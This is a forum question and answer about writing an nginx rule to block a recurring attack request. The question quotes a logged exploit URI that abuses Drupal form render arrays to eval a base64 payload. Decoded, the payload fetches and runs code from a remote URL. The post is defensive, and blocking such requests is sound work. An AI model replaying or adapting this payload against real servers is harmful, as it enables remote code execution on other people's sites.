# eval base64 virus - nginx regex prevention

Tags: regex, security, nginx, virus

this is a common virus that hits with a post URI like:

```
/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/
```

How to prevent it from going through nginx?

I tried

```
location ~* base64 { 
    return 404;
}
```

to put down any request with base64 in it but it doesn't work. Please help and give me the right nginx regex rule. (I can't modify the app codebase or update the system).

Answer (score 1):

```
if ($query_string ~ "base64") {
    return 404;
}
```